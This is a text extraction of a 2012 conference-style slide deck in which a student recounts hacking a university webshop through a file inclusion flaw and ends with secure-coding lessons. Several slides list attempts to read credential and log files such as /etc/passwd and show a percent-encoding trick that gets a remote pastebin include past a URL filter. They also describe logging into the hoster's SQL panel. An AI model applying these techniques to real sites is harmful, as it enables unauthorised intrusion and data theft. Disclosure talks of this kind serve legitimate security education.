Oops! d e How I accidentally the k c a h University's - - PowerPoint PPT Presentation

Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 1

Oops!

How I accidentally the University's Merchandising Shop

h a c k e d

Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 2

About UniBwM

• University of the German Federal Armed

Forces, Munich

• ~3700 students in 2011
• Corporate Design
• Sells shirts and stuff via

student-driven webshop

UniBwM Press Archive

Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 3

About Me

• Student of Computer Aided Engineering
• Assistant at Network Security department
• find them holes!
• www.danrl.de

Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 4

Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 5

static dynamic

Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 6

http://www.uni-fashion.de/index.php?inhalt=artikel.php&...

Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 7

That's a filename!

A closer look

http://www.uni-fashion.de/index.php?inhalt=artikel.php&...

Filename is used to load dynamic content. Unfortunately, thats some bad kind of brainchild :(

Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 8

Behind the scenes

Visitor Webserver index.php artikel.php

We call this technique File Inclusion

Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 9

Escalating

• Let's try some other filenames
• /etc/passwd
• /var/log/messages
• /root/.bash_history

Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 10

No success!

(that's good from the security point of view)

Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 11

Remote File Inclusion

Attacker Webserver index.php evil.php Evil Webserver artikel.php

Let's create some harmless code to include!

Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 12

Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 13

Raw Code

Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 14

Fail!

No success!

(that's good from the security point of view)

Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 15

Difference makes a difference

But wait... ...don't these error messages look different? What does that mean?

Website Error Webserver Error

Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 16

Questions

• Why failed the Remote File Inclusion attack?
• Why do local files generate other errors than

remote files?

index.php .htaccess “Rules” “Filtering” Webserver

Request

Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 17

No guts, no glory!

=http is filtered

Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 18

Fail!

=http is filtered

Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 19

Enconding issues

• In an URL one can write every character as

%<HEX-ASCII>

• Same URL, different writing
• http://uni-fashion.de/index.php?a=bc
• http://uni-fashion.de/index.php?a=%61%62
• Will the filter catch this one?
• http://uni-fashion.de/index.php?inhalt=

%68ttp://pastebin.com/raw.php?i=XqcNB6hz

h as %<HEX-ASCII>

Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 20

Bazinga!

Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 21

Can you keep a secret?

• New code
• New URL
• Same game

WTF?

Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 22

A few no-brainers

• Lookup Hoster in WHOIS
• Find URL to Hosters SQL-Adminpanel
• Login in with correct password :)

Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 23

Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 24

My work here is done...

Might be useful :)

Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 25

Lessons learned

• Always validate every user-based input!
• Seriously, do it!
• Do not fix bad code with filters, better repair

your code!

• Never trust encoding!
• Use SSL for your SQL-Admin :)
• I can haz a free T-Shirt now?

Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 26

Thanks!

Questions?